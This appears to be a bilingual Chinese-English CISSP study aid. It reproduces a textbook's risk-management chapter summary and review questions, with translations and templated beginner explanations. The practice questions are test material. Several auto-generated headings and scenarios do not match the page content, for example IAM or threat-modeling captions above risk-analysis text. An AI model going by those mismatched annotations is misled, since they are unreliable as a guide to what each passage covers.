Know what single loss expectancy (SLE) is and how to calculate it. SLE is an element of quantitative risk analysis that represents the cost associated with a single realized risk against a specific asset. The formula is SLE = asset value (AV) * exposure factor (EF). Know what annualized loss expectancy (ALE) is and how to calculate it. ALE is an element of quantitative risk analysis that represents the possible yearly cost of all instances of a specific realized threat against a specific asset. The formula is ALE = single loss expectancy (SLE) * annualized rate of occurrence (ARO). Know the formula for safeguard evaluation.

In addition to determining the annual cost of a safeguard, you must calculate the ALE for the asset if the safeguard is implemented. Use this formula: ALE before safeguard – ALE after implementing the safeguard – annual cost of safeguard = value of the safeguard to the company, or (ALE1 – ALE2) – ACS. Know the options for handling risk. Reducing risk, or risk mitigation, is the implementation of safeguards and countermeasures. Assigning risk or transferring a risk places the cost of loss a risk represents onto another entity or organization. Purchasing insurance is one form of assigning or transferring risk.

Risk deterrence is the process of implementing deterrents to would-be violators of security and policy. Risk avoidance is the process of selecting alternate options or activities that have less associated risk than the default, common, expedient, or cheap option. Accepting risk means management has evaluated the cost/benefit analysis of possible safeguards and has determined that the cost of the countermeasure greatly outweighs the possible cost of loss due to a risk. It also means that management has agreed to accept the consequences and the loss if the risk is realized. Understand security control assessment (SCA).

An SCA is the formal evaluation of a security infrastructure's individual mechanisms against a baseline or reliability expectation. Understand security monitoring and measurement. Security controls should provide benefits that can be monitored and measured. If a security control's benefits cannot be quantified, evaluated, or compared, then it does not actually provide any security. Understand risk reporting. Risk reporting involves the production of a risk report and a presentation of that report to the interested/relevant parties. A risk report should be accurate, timely, comprehensive of the entire

中文直译 / 整理

了解单次损失预期(SLE)及其计算方法。 SLE 是定量风险分析的一个要素, 表示针对特定资产的单次实际风险所关联的成本。 公式为 SLE = 资产价值( AV)× 暴露因子(EF)。 了解年化损失预期 pectanc y (ALE) 是什么以及如何 计算它。 ALE 是定量风险分析的一个要素,表示特定威胁针对特定资产时可能 造成的年度总成本。 公式为:ALE = 单次损失预期 (SLE) × 年度发生率 (ARO)。 了解安全措施评估的公式。 除了确定安全措施的年度成本外,您还必须计算实施 该安全措施后资产的 ALE。 使用以下公式:实施安全措施前的 ALE – 实施安全 措施后的 ALE – 安全措施的年度成本 = 该安全措施对公司的价值,即 (ALE1 – ALE2) – ACS。 了解处理风险的选项。 降低风险,即风险缓解,是指实施安全措施和应对措施。 分配风险或转移风险是将风险所代表的损失成本转移给另一方或组织。 购买保险 是分配或转移风险的一种形式。 风险威慑是指实施威慑措施以阻止潜在的违反安 全和政策的行为。 风险规避是指选择替代方案或活动,其相关风险低于默认、常 见、便捷或低成本的选项。

接受风险意味着管理层已对可能的安全措施的成本/效 益进行了评估,并确定了应对措施的成本远高于风险可能造成的损失成本。 这也 意味着管理层已同意接受风险实现后所产生的后果和损失。 理解安全控制评估(SCA)。 SCA 是对安全基础设施的各个机制相对于基线或 可靠性期望的正式评估。 理解安全监控与度量。 安全控制应提供可监控和度量的益处。 如果一个安全控 制的益处无法量化、评估或比较,那么它实际上并未提供任何安全性。 理解风险报告。 风险报告涉及编制风险报告并向相关方进行汇报。 风险报告应准 确、及时、全面涵盖整个

小白解释

场景先行:你是公司的安全负责人,正在读第 223 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 223 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 85 / PDF P224

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

organization, clear and precise to support decision-making, and updated on a regular basis. Understand the Risk Maturity Model (RMM). The Risk Maturity Model (RMM) is a means to assess the key indicators and activities of a mature, sustainable, and repeatable risk management process. The RMM levels are ad hoc, preliminary, defined, integrated, and optimized. Know about legacy system security risk. Legacy systems are often a threat because they may not be receiving security updates from their vendors. End of life (EOL) is the point at which a manufacturer no longer produces a product.

End of service life (EOSL) or end of support (EOS) are those that are no longer receiving updates and support from the vendor. Understand social engineering. Social engineering is a form of attack that exploits human nature and human behavior. The common social engineering principles are authority, intimidation, consensus, scarcity, familiarity, trust, and urgency. Such attacks may be used to elicit information or gain access through the use of pretexting and/or prepending.

Social engineering attacks include phishing, spear phishing, business email compromise (BEC), whaling, smishing, vishing, spam, shoulder surfing, invoice scams, hoaxes, impersonation, masquerading, tailgating, piggybacking, baiting, dumpster diving, identity fraud, typosquatting, and influence campaigns. Know how to implement security awareness training and education. Before actual training can take place, awareness of security as a recognized entity must be created for users. Once this is accomplished, training, or teaching employees to perform their work tasks and to comply with the security policy, can begin.

All new employees require some level of training so that they will be able to comply with all standards, guidelines, and procedures mandated by the security policy. Education is a more detailed endeavor in which students/users learn much more than they actually need to know to perform their work tasks. Education is most often associated with users pursuing certification or seeking job promotion. Know about the need for periodic content reviews and effectiveness evaluations. It is important to perform periodic content reviews of all training materials.

This is to ensure that the training materials and presentation stays in line with business goals, organizational mission, and security objectives. Some means of verification should be used to measure whether the training is beneficial or a waste of time and resources.

中文直译 / 整理

组织,清晰明确以支持决策,并定期更新。 了解风险成熟度模型(RMM)。 风险成熟度模型(RMM)是一种评估成 熟、可持续且可重复的风险管理过程的关键指标和活动的方法。 RMM的级 别包括临时性、初步性、已定义、集成化和优化。 了解遗留系统安全风险。 遗留系统通常构成威胁,因为它们可能不再从供应商处 获得安全更新。 生命周期结束(EOL)是指制造商不再生产某产品的时点。 服务 生命周期结束(EOSL)或支持结束(EOS)是指不再接收供应商更新和支持的 系统。 了解社会工程学。 社会工程学是一种利用人性和人类行为的攻击形式。 常见的 社会工程学原则包括权威、恐吓、从众、稀缺性、熟悉度、信任和紧迫感。 此类 攻击可能通过伪装和/或预置手段诱使信息泄露或获取访问权限。 社会工程学攻 击包括钓鱼、鱼叉式钓鱼、商业邮件入侵(BEC)、鲸钓、短信钓鱼、语音钓鱼、 垃圾邮件、肩窥、发票诈骗、恶作剧、冒充、伪装、尾随、搭便车、诱饵、翻找 垃圾、身份欺诈、拼写错误域注册和影响活动。 了解如何实施安全意识培训和 教育。 在实际培训开始之前,必须让用户认识到安全作为一个公认实体的重要性。

一旦完成这一目标,即可开始培训,即教导员工如何执行其工作任务并遵守安全 政策。 所有新员工都需要接受一定程度的培训,以便能够遵守安全政策所规定的 各项标准、指南和程序。 教育是一项更为细致的工作,学员/用户在此过程中学习 的内容远超其完成工作任务所需的知识。 教育通常与用户追求认证或寻求职位晋 升相关联。 了解定期审查内容和评估培训效果的必要性。 定期审查所有培训材料至关重要, 以确保培训内容和呈现方式与业务目标、组织使命和安全目标保持一致。 应采用 某种验证手段来衡量培训是否有效,或只是浪费时间和资源。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 86 / PDF P225

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

Written Lab 1. Name six different administrative controls used to secure personnel. 2. What are the basic formulas or values used in quantitative risk assessment? 3. Describe the process or technique used to reach an anonymous consensus during a qualitative risk assessment. 4. Discuss the need to perform a balanced risk assessment. What are the techniques that can be used and why is this necessary? 5. What are the main types of social engineering principles? 6. Name several types or methods of social engineering. Review Questions 1. You have been tasked with overseeing the security improvement project for your organization.

The goal is to reduce the current risk profile to a lower level without spending considerable amounts of money. You decide to focus on the largest concern mentioned by your CISO. Which of the following is likely the element of the organization that is considered the weakest? A. Software products B. Internet connections C. Security policies D. Humans 2. Due to recent organization restructuring, the CEO believes that new workers should be hired to perform necessary work tasks and support the mission and goals of the organization. When seeking to hire new employees, what is the first step? A. Create a job description. B. Set position classification. C. Screen candidates. D. Request résumés.

中文直译 / 整理

书面实验 1. 列出六种用于保障人员安全的管理控制措施。 2. 定量风险评估中使用的基本公式或值有哪些? 3. 描述在定性风险评估中达成匿名共识的过程或技术。 4. 讨论进行平衡风险评估的必要性。 可以使用哪些技术? 为什么这是必要的? 5. 社会工程学的主要原则有哪些? 6. 列出几种社会工程学的类型或方法。 复习问题 1. 您被委派负责贵组织的安全改进项目,目标是在不花费大量资金的情况下, 将当前的风险水平降低到更低水平。 您决定专注于首席信息安全官(CISO) 提到的最主要问题。 以下哪一项最可能是该组织中最薄弱的环节? A. 软件产品 B. 互联网连接 C. 安全策略 D. 人类 2. 由于最近的组织重组,首席执行官认为应招聘新员工来完成必要的工 作任务,并支持组织的使命和目标。 在招聘新员工时,第一步是什么? A. 创建职位描述。 B. 设定职位分类。 C. 筛选候选人。 D. 请求简历。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 87 / PDF P226

第 226 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

3. _________________ is the process of adding new employees to the organization, having them review and sign policies, be introduced to managers and coworkers, and be trained in employee operations and logistics. A. Reissue B. Onboarding C. Background checks D. Site survey 4. After repeated events of retraining, a particular worker was caught for the fourth time attempting to access documents that were not relevant to their job position. The CSO decides this was the last chance, and the worker is to be fired. The CSO reminds you that the organization has a formal termination process that should be followed.

Which of the following is an important task to perform during the termination procedure to reduce future security issues related to this former employee? A. Return the exiting employee's personal belongings. B. Review the nondisclosure agreement. C. Evaluate the exiting employee's performance. D. Cancel the exiting employee's parking permit. 5. Which of the following is a true statement in regard to vendor, consultant, and contractor controls? A. Using business email compromise (BEC) is a means to ensure that organizations providing services maintain an appropriate level of service agreed on by the service provider, vendor, or contractor and the customer organization. B.

Outsourcing can be used as a risk response option known as acceptance or appetite. C. Multiparty risk exists when several entities or organizations are involved in a project. The risk or threats are often due to the variations of objectives, expectations, timelines, budgets, and security priorities of those involved. 3. _________________

中文直译 / 整理

是将新员工添加到组织中的过程,包括让他们 审阅并签署政策、认识经理和同事,并接受员工操作和后勤方面的培训。 A. 重新签发 B. 入职 C. 背景调查 D. 现场勘查 4. 在多次重新培训后,某位员工第四次被发现试图访问与其职位无关的文档。 CSO认为这是最后一次机会,决定解雇该员工。 CSO提醒您,组织有正式的 终止流程应予遵循。 以下哪一项是终止程序中为减少与该前员工相关的未来 安全问题而必须执行的重要任务? A. 归还离职员工的个人物品。 B. 审阅保密协议。 C. 评估离职员工的绩效。 D. 取消离职员工的停车许可。 5. 以下哪项关于供应商、顾问 , 以及承包商控制? A. 利用商业电子邮件泄露(BEC)是确保提供服务的组织维持服务提 供商、供应商或承包商与客户组织商定的适当服务水平的一种手段。 B. 外包可用作一种被称为风险接受或风险偏好的应对策略。 C. 多方风险存在于多个实体或组织参与项目的情况下。 这些风险或 威胁通常源于各方目标、期望、时间表、预算和安全优先级的差异。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 226 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 88 / PDF P227

第 227 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

D. Risk management strategies implemented by one party do not cause additional risks against or from another party. 6. Match the term to its definition: 1. Asset 2. Threat 3. Vulnerability 4. Exposure 5. Risk I. The weakness in an asset, or the absence or the weakness of a safeguard or countermeasure. II. Anything used in a business process or task. III. Being susceptible to asset loss because of a threat; there is the possibility that a vulnerability can or will be exploited. IV. The possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset and the severity of damage that could result. V.

Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset. A. 1-II, 2-V, 3-I, 4-III, 5-IV B. 1-I, 2-II, 3-IV, 4-II, 5-V C. 1-II, 2-V, 3-I, 4-IV, 5-III D. 1-IV, 2-V, 3-III, 4-II, 5-I 7. While performing a risk analysis, you identify a threat of fire and a vulnerability of things being flammable because there are no fire extinguishers. Based on this information, which of the following is a possible risk? A. Virus infection B. Damage to equipment C. System malfunction D. Unauthorized access to confidential information D.

中文直译 / 整理

一方实施的风险管理策略不得对另一方造成额外风险,或从另一方引发额 外风险。 6. 将术语与其定义匹配: 1. 资产 2. 威胁 3. 漏洞 4. 暴露 5. 风险 I. 资产中的弱点,或防护措施或控制措施的缺失或薄弱。 II. 用于业务流程或任务中的任何事物。 III. 由于威胁而使资产遭受损失的脆弱性; 存在漏洞被利用的可能性。 IV. 威胁利用漏洞对资产造成损害的可能性或概率,以及可能造成的损害 严重程度。 V. 任何可能对组织或特定资产造成不良或不希望后果的潜在事件。 A. 1‑II,2‑V,3‑I,4‑III,5‑IV B. 1‑I,2‑II,3‑IV,4‑II,5‑V C. 1‑II,2‑V,3‑I,4‑IV,5‑III D. 1‑IV,2‑V,3‑III,4‑II,5‑I 7. 在进行风险分析时,您识别出火灾威胁和物品易燃的漏洞,原因是没 有灭火器。 根据这些信息,以下哪一项是可能的风险? A. 病毒感染 B. 设备损坏 C. 系统故障 D. 未经授权访问机密信息

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 227 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 89 / PDF P228

第 228 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

8. During a meeting of company leadership and the security team, discussion focuses on defining the value of assets in dollars, inventorying threats, predicting the specific amount of harm of a breach, and determining the number of times a threat could cause harm to the company each year. What is being performed? A. Qualitative risk assessment B. Delphi technique C. Risk avoidance D. Quantitative risk assessment 9. You have performed a risk assessment and determined the threats that represent the most significant concern to your organization. When evaluating safeguards, what is the rule that should be followed in most cases? A.

The expected annual cost of asset loss should not exceed the annual costs of safeguards. B. The annual costs of safeguards should equal the value of the asset. C. The annual costs of safeguards should not exceed the expected annual cost of asset value loss. D. The annual costs of safeguards should not exceed 10 percent of the security budget. 10. During a risk management project, an evaluation of several controls determines that none are cost-effective in reducing the risk related to a specific important asset. What risk response is being exhibited by this situation? A. Mitigation B. Ignoring C. Acceptance D. Assignment 11.

During the annual review of the company's deployed security infrastructure, you have been reevaluating each security control selection. How is the value of a safeguard to a company calculated? 8.

中文直译 / 整理

在公司领导层与安全团队的会议中,讨论重点在于以美元定义资产价值、 盘点威胁、预测 breaches 所造成的具体损害金额,以及确定威胁可能造成 损害的次数 公司每年进行。 正在执行什么? A. 定性风险评估 B. 德尔菲法 C. 风险规避 D. 定量风险评估 9. 您已完成风险评估,并确定了对贵组织构成最重大威胁的威胁。 在评估 防护措施时,大多数情况下应遵循什么原则? A. 资产损失的预期年成本不应超过安全措施的年成本。 B. 安全措施的年成本应等于资产的价值。 C. 安全措施的年成本不应超过资产价值损失的预期年成本。 D. 安全措施的年成本不应超过安全预算的10%。 10. 在风险管理项目中,对若干控制措施的评估确定,没有任何措施能以成 本效益方式降低与某一重要资产相关风险。 这种情况体现了何种风险应对方 式? A. 缓解 B. 忽略 C. 接受 D. 转让 11. 在对公司部署的安全基础设施进行年度审查时,您正在重新评估每 一项安全控制措施的选择。 如何计算一项防护措施对公司的价值?

小白解释

场景先行:你是公司的安全负责人,正在读第 228 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 228 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 90 / PDF P229

威胁建模方法:PASTA、STRIDE、DREAD

分类、建模、评分、优先级是不同层次。

教材原文段落

A. ALE before safeguard – ALE after implementing the safeguard – annual cost of safeguard B. ALE before safeguard * ARO of safeguard C. ALE after implementing safeguard + annual cost of safeguard – controls gap D. Total risk – controls gap 12. Which of the following are valid definitions for risk? (Choose all that apply.) A. An assessment of probability, possibility, or chance B. Anything that removes a vulnerability or protects against one or more specific threats C. Risk = threat * vulnerability D. The presence of a vulnerability when a related threat exists 13. A new web application was installed onto the company's public web server last week.

Over the weekend a malicious attacker was able to exploit the new code and gained access to data files hosted on the system. This is an example of what issue? A. Inherent risk B. Risk matrix C. Qualitative assessment D. Residual risk 14. Your organization is courting a new business partner. During the negotiations the other party defines several requirements of your organization's security that must be met prior to the signing of the SLA and business partners agreement (BPA). One of the requirements is that your organization demonstrate their level of achievement on the Risk Maturity Model (RMM).

The requirement is specifically that a common or standardized risk framework is adopted organization-wide. Which of the five possible levels of RMM is being required of your organization? A. Preliminary B. Integrated C. Defined A.

中文直译 / 整理

实施防护措施前的ALE – 实施防护措施后的ALE – 防护措施的年成本 B. 实施防护措施前的ALE × 防护措施的ARO C. 实施防护措施后的ALE + 防护措施的年成本 – 控制差距 D. 总风险 – 控制差距 12. 以下哪些是风险的有效定义? (可多选。 ) A. 对可能性、概率或机会的评估 B. 任何消除漏洞或保护免受一个或多个特定威胁影响的事物 C. 风险 = 威胁 * 漏洞 D. 当相关威胁存在时,漏洞的存在 13. 上周,一个新的Web应用程序被安装到公司的公共Web服务器上。 周末, 一名恶意攻击者利用了这段新代码,获得了对系统上托管的数据文件的访问权 限。 这是什么问题的示例? A. 固有风险 B. 风险矩阵 C. 定性评估 D. 残余风险 14. 您的组织正在寻求与一个新的业务合作伙伴建立合作关系。 在谈判过程中, 对方提出了关于您组织安全的若干要求,这些要求必须在签署SLA之前满足 以及业务合作伙伴协议(BPA)。 其中一项要求是,您的组织必须展示其 在风险成熟度模型(RMM)上的达成水平。 具体要求是,整个组织必须 采用一种通用或标准化的风险框架。

您组织被要求达到RMM五个可能级 别中的哪一个? A. 初级 B. 集成 C. 已定义

小白解释

场景先行:你是公司的安全负责人,正在读第 229 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:分类、建模、评分、优先级是不同层次。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模方法:PASTA、STRIDE、DREAD”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 91 / PDF P230

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

D. Optimized 15. The Risk Management Framework (RMF) provides a disciplined, structured, and flexible process for managing security and privacy risk that includes information security categorization; control selection, implementation, and assessment; system and common control authorizations; and continuous monitoring. The RMF has seven steps or phases. Which phase of the RMF focuses on determining whether system or common controls based on a determination that the risk to organizational operations and assets, individuals, other organizations, and the Nation are acceptable? A. Categorize B. Authorize C. Assess D. Monitor 16.

Company proprietary data is discovered on a public social media posting by the CEO. While investigating, a significant number of similar emails were discovered to have been sent to employees, which included links to malicious sites. Some employees report that they had received similar messages to their personal email accounts as well. What improvements should the company implement to address this issue? (Choose two.) A. Deploy a web application firewall. B. Block access to personal email from the company network. C. Update the company email server. D. Implement multifactor authentication (MFA) on the company email server. E. Perform an access review of all company files. F.

Prohibit access to social networks on company equipment. 17. What process or event is typically hosted by an organization and is targeted to groups of employees with similar job functions? A. Education B. Awareness C. Training D.

中文直译 / 整理

优化 15. 风险管理框架(RMF)提供了一种有纪律、结构化且灵活的流程,用于 管理安全和隐私风险,包括信息安全分类; 控制选择、实施和评估; 系统和 通用控制授权; 以及持续监控。 RMF 包含七个步骤或阶段。 哪个 RMF 阶段 侧重于根据对组织运营和资产、个人、其他组织及国家的风险可接受性判断, 确定系统或通用控制是否合适? A. 分类 B. 授权 C. 评估 D. 监控 16. 公司专有数据被CEO在公共社交媒体帖子中发现。 在调查过程中,发现大 量类似邮件被发送给员工,其中包含指向恶意网站的链接。 一些员工报告称, 他们也收到了发送到个人邮箱的类似信息。 公司应实施哪些改进措施来解决 此问题? (选择两项。 ) A. 部署Web应用防火墙。 B. 阻止从公司网络访问个人邮箱。 C. 更新公司邮件服务器。 D. 在公司邮件服务器上实施多因素认证(MFA)。 E. 对所有公司文件执行访问审查。 F. 禁止在公司设备上访问社交网络。 17. 通常由组织举办并面向具有相似工作职能的员工群体的流程或活动是什 么? A. 教育 B. 意识提升 C. 培训

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

